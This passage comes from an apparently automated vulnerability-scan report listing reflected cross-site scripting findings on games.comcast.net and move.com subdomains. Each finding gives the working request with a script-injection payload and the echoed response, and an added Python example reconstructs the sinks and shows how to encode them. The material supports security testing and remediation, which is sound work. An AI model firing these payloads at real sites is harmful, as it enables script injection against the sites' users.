Set-Cookie: ssid=bd1con7p94do1s3jm7bhu9gk82; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:11:18 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:11:18 GMT; path=/
Content-Length: 629
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=1107339456.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /dc5c1</noscript><script>alert(1)</script>22c38537d71/s6/filter-casual/MacGames was not found on this server.</p>
...[SNIP]...

2.58. http://games.comcast.net/t_03cm/s6/filter-casual/MacGames [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /t_03cm/s6/filter-casual/MacGames

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

GET /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames HTTP/1.1
Host: games.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 19 Dec 2010 18:11:34 GMT
Server: Apache
Set-Cookie: ssid=ii7uo2kh80idg52kfki2hku1b4; path=/; domain=games.comcast.net
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: affiliate_code=t_03cm; expires=Fri, 17-Jun-2011 18:11:34 GMT; path=/
Set-Cookie: aff_lang-t_03cm=en; expires=Fri, 17-Jun-2011 18:11:34 GMT; path=/
Content-Length: 635
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: GSPersist=570534080.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
<script type='text/javascript'>
function redirect() {
document.location = 'http:/
...[SNIP]...
<p>The requested URL /t_03cm/s6b1b9d</noscript><script>alert(1)</script>4a6c6e6c8c9/filter-casual/MacGames was not found on this server.</p>
...[SNIP]...

2.59. http://moving.move.com/Move/Moving/Default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /Move/Moving/Default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de42a</script><script>alert(1)</script>185f2068544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Move/Moving/Default.asp?de42a</script><script>alert(1)</script>185f2068544=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:14 GMT
X-Powered-By: ASP.NET
Content-Length: 39615
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A15+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/moving/default.asp@ -->

<html>
<head>
<tit
...[SNIP]...
valid Zip Code');
               form.Zip.focus();    
               isValid = false;
           }        
}
       if (isValid==true){
           form.action = form.action + '&Showzip=' + form.Zip.value +'&' + arrLinks[intMoveType] + '&' + 'de42a</script><script>alert(1)</script>185f2068544=1';
           form.submit();
           if(document.mover.MoveType.value==2)
           isValid=false;        }

       return isValid;
       
   }
   function validateUSZip( strValue ) {
       /******************************************
...[SNIP]...

2.60. http://moving.move.com/move/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /move/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6723'-alert(1)-'369fa1d63f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /move/?d6723'-alert(1)-'369fa1d63f=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:13 GMT
X-Powered-By: ASP.NET
Content-Length: 69841
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A13+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/default.asp@ -->

<html>
<head>
<title>
Mo
...[SNIP]...
){
                                       document.mquoteform.action = document.mquoteform.action + '&Showzip=' + document.mquoteform.Zip.value + '&MDate=' + document.mquoteform.MDate.value + '&' + arrLinks[intMoveType] + '&' + 'd6723'-alert(1)-'369fa1d63f=1';
                                       document.mquoteform.submit();
                                       if(document.mquoteform.MoveType.value==2)
                                            isValid=false;
                                       
                                   }
                                   return isValid;
                               }
                               fun
...[SNIP]...

2.61. http://moving.move.com/move/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://moving.move.com
Path:   /move/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be453'-alert(1)-'aa41f058865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /move/default.asp?be453'-alert(1)-'aa41f058865=1 HTTP/1.1
Host: moving.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:14 GMT
X-Powered-By: ASP.NET
Content-Length: 69842
Content-Type: text/html
Set-Cookie: DART=AdPops=move%7C%3A%3A12%2F19%2F2010+11%3A28%3A14+AM; expires=Mon, 19-Dec-2011 18:13:14 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<!-- Not @ HOMS -->
<!-- homestore.comMOV/move/default.asp@ -->

<html>
<head>
<title>
Mo
...[SNIP]...
){
                                       document.mquoteform.action = document.mquoteform.action + '&Showzip=' + document.mquoteform.Zip.value + '&MDate=' + document.mquoteform.MDate.value + '&' + arrLinks[intMoveType] + '&' + 'be453'-alert(1)-'aa41f058865=1';
                                       document.mquoteform.submit();
                                       if(document.mquoteform.MoveType.value==2)
                                            isValid=false;
                                       
                                   }
                                   return isValid;
                               }
                               fun
...[SNIP]...

2.62. http://newhomes.move.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654a4"><script>alert(1)</script>8b33e015dd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?654a4"><script>alert(1)</script>8b33e015dd7=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:19 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=o5vq4czwk254vfmssftqyijg; path=/; HttpOnly
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:19 GMT; path=/
Set-Cookie: Personal333=; expires=Mon, 19-Dec-2011 18:22:19 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 35302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang=
...[SNIP]...
gnIn" href="/Login/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('//LoginModal','http://newhomes.move.com/Default.aspx?654a4"><script>alert(1)</script>8b33e015dd7=1','//LoginModal/popupwindow-true','PPWINSHOW',333)}, function(){SdcAjaxLog('//LoginModal','http://newhomes.move.com/Default.aspx?654a4">
...[SNIP]...

2.63. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-100/city-elgin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e94"><script>alert(1)</script>d77209e2310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-100/city-elgin?94e94"><script>alert(1)</script>d77209e2310=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=4yy01rfbldji5ha32sp5kfjn; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=100&state=IL&searchtext=elgin; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 217609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?94e94"><script>alert(1)</script>d77209e2310=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?94e94">
...[SNIP]...

2.64. http://newhomes.move.com/comcast/communityresults/market-100/city-elgin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-100/city-elgin

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 98ac7--><script>alert(1)</script>ac0c2d01358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-100/city-elgin?98ac7--><script>alert(1)</script>ac0c2d01358=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=gbod1pi2b0cgqd455h5gppiy; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=100&state=IL&searchtext=elgin; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 216643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?98ac7--><script>alert(1)</script>ac0c2d01358=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?98ac7-->
...[SNIP]...

2.65. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-112

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6873e--><script>alert(1)</script>4919b76ff04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-112?6873e--><script>alert(1)</script>4919b76ff04=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=nnyk2umyfj14ar45xxcru245; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:52 GMT; path=/
Set-Cookie: Personal8549=market=112&state=IN; expires=Mon, 19-Dec-2011 18:22:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 192747


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?6873e--><script>alert(1)</script>4919b76ff04=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?6873e-->
...[SNIP]...

2.66. http://newhomes.move.com/comcast/communityresults/market-112 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-112

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfb31"><script>alert(1)</script>b122dc6b5fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-112?dfb31"><script>alert(1)</script>b122dc6b5fa=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:43 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=cgckrd45hjb4rdupds3tuc45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:43 GMT; path=/
Set-Cookie: Personal8549=market=112&state=IN; expires=Mon, 19-Dec-2011 18:22:43 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 181242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?dfb31"><script>alert(1)</script>b122dc6b5fa=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?dfb31">
...[SNIP]...

2.67. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 634c0--><script>alert(1)</script>24754516b9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-174?634c0--><script>alert(1)</script>24754516b9a=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=z2q4km45qwznqi55l2zmrg45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=174&state=NC; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?634c0--><script>alert(1)</script>24754516b9a=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?634c0-->
...[SNIP]...

2.68. http://newhomes.move.com/comcast/communityresults/market-174 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b60"><script>alert(1)</script>efb2d8e3b8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-174?a4b60"><script>alert(1)</script>efb2d8e3b8d=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:42 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=wgsjt3yc1ozc3l45idb1cv45; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:42 GMT; path=/
Set-Cookie: Personal8549=market=174&state=NC; expires=Mon, 19-Dec-2011 18:22:42 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 176755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?a4b60"><script>alert(1)</script>efb2d8e3b8d=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?a4b60">
...[SNIP]...
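
Findings 2.67 and 2.68 (and the pairs that repeat them for other market and city paths in 2.69 to 2.82) are the same two sinks fed by the same source: the application embeds the full request URL, already rewritten to /Default.aspx by UrlRewriter.NET (see the X-Powered-By header), into a JavaScript string inside a double-quoted onclick attribute, and, per the scanner, into an HTML comment. Any parameter name is carried through unencoded. One caveat a reviewer should note: the snippets shown for the comment-context findings reproduce the reflection inside the onclick attribute, where the `-->` in the payload closes nothing (only a `"` can end that attribute); the comment that makes the `-->` payload fire lies elsewhere in the truncated response. Conversely, the `">` payload fires from the attribute and is inert inside a comment. The following is an added example, not code from the report, from Burp Suite or from move.com: it reconstructs both sinks under an assumed page template (the `<!-- page: ... -->` comment, the `Log in` anchor and all function names are assumptions, since the ASP.NET source is not in the report), shows the per-context encoding that closes them, and includes a small HTML-state scanner that reports which copy of a probe actually lands in a context where a browser would execute it.

```python
"""Added example (not from the XSS.CX report, Burp Suite or move.com).

Reconstructs the two reflection sinks flagged on newhomes.move.com
(2.67: HTML comment; 2.68: double-quoted attribute holding an onclick
handler), applies context-aware output encoding to both, and scans a
response body to see which copy of a probe would actually execute.
The template, the 'page:' comment and all function names are assumptions.
"""
import html
import json
import re
from urllib.parse import quote

# Probe payloads exactly as the report shows them (2.67 and 2.68).
COMMENT_PAYLOAD = '634c0--><script>alert(1)</script>24754516b9a'
ATTR_PAYLOAD = 'a4b60"><script>alert(1)</script>efb2d8e3b8d'
SCRIPT = '<script>alert(1)</script>'


def request_url(param_name: str) -> str:
    """URL as the report shows it reflected: UrlRewriter.NET has rewritten
    the path to /Default.aspx and the arbitrary parameter name survives."""
    return f'http://newhomes.move.com/Default.aspx?{param_name}=1'


def render_vulnerable(url: str) -> str:
    """Assumed template: the request URL is dropped raw into an HTML comment
    and into a JS string inside a double-quoted onclick attribute."""
    return (
        f'<!-- page: {url} -->\n'
        '<a href="/comcast/login/popupwindow-false" '
        f"onclick=\"SdcAjaxLog('/comcast/LoginModal','{url}','PPWINSHOW',8549)\">"
        'Log in</a>'
    )


def js_string(s: str) -> str:
    """Encode s as a JS string literal.  json.dumps escapes quotes and
    backslashes; <, >, & and the single quote are additionally written as
    unicode escapes so the literal is inert even before HTML encoding."""
    lit = json.dumps(s)
    return re.sub(r"[<>&']", lambda m: '\\u%04x' % ord(m.group()), lit)


def attr(s: str) -> str:
    """HTML attribute encoding; quote=True also escapes both quote kinds."""
    return html.escape(s, quote=True)


def render_hardened(url: str) -> str:
    """Same template with per-context encoding.  Comments have no escape
    syntax, so the URL is percent-encoded there (no <, >, double quote or !
    survives, so neither --> nor --!> can be formed).  The handler gets two
    layers, innermost first: JS string literal, then attribute encoding."""
    in_comment = quote(url, safe='/:?=&%')
    in_handler = attr(js_string(url))
    return (
        f'<!-- page: {in_comment} -->\n'
        '<a href="/comcast/login/popupwindow-false" '
        f"onclick=\"SdcAjaxLog('/comcast/LoginModal',{in_handler},'PPWINSHOW',8549)\">"
        'Log in</a>'
    )


def parse_states(body: str) -> list:
    """Minimal HTML tokenizer: pre[i] is the parser state just before
    character i is consumed: 'text', 'comment', 'tag' (inside <...> but
    outside quotes) or 'attr' (inside a quoted attribute value).  Raw-text
    elements such as <script> bodies are not modelled; enough for these sinks."""
    pre, state, quote_ch, i = [], 'text', None, 0
    while i < len(body):
        c = body[i]
        if state == 'text' and body.startswith('<!--', i):
            pre.extend([state] * 4); i += 4; state = 'comment'
        elif state == 'text' and c == '<':
            pre.append(state); i += 1; state = 'tag'
        elif state == 'comment' and body.startswith('-->', i):
            pre.extend([state] * 3); i += 3; state = 'text'
        elif state == 'tag' and c in '"\'':
            pre.append(state); i += 1; state, quote_ch = 'attr', c
        elif state == 'tag' and c == '>':
            pre.append(state); i += 1; state = 'text'
        elif state == 'attr' and c == quote_ch:
            pre.append(state); i += 1; state = 'tag'
        else:
            pre.append(state); i += 1
    return pre


def contexts(body: str, needle: str) -> list:
    """Parser state at each literal occurrence of needle, in document order."""
    pre = parse_states(body)
    return [pre[m.start()] for m in re.finditer(re.escape(needle), body)]


def executes(body: str) -> bool:
    """True when some copy of the probe's <script> lands in text context,
    i.e. where the browser parses it as a tag and runs it."""
    return 'text' in contexts(body, SCRIPT)


if __name__ == '__main__':
    for name, payload in (('2.67 comment probe', COMMENT_PAYLOAD),
                          ('2.68 attribute probe', ATTR_PAYLOAD)):
        vuln = render_vulnerable(request_url(payload))
        hard = render_hardened(request_url(payload))
        print(name, 'reflected in', contexts(vuln, payload),
              '| script lands in', contexts(vuln, SCRIPT),
              '| executes:', executes(vuln), '-> hardened:', executes(hard))
```

Run as a script it shows that each probe is reflected into both the comment and the attribute, but only one copy reaches text context: the `-->` probe escapes the comment while staying inert in the onclick value, and the `">` probe does the reverse. Against the hardened template neither probe appears literally in either sink and no `<script>` reaches text context. The ordering of the two encoders in the handler matters: the browser decodes attribute entities first and hands the result to the JavaScript parser, so the JS-literal layer must be applied first and the attribute layer last.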

2.69. http://newhomes.move.com/comcast/communityresults/market-174/city-fort+mill [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-174/city-fort+mill

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42dbc"><script>alert(1)</script>82ed0c235b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-174/city-fort+mill?42dbc"><script>alert(1)</script>82ed0c235b1=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:47 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
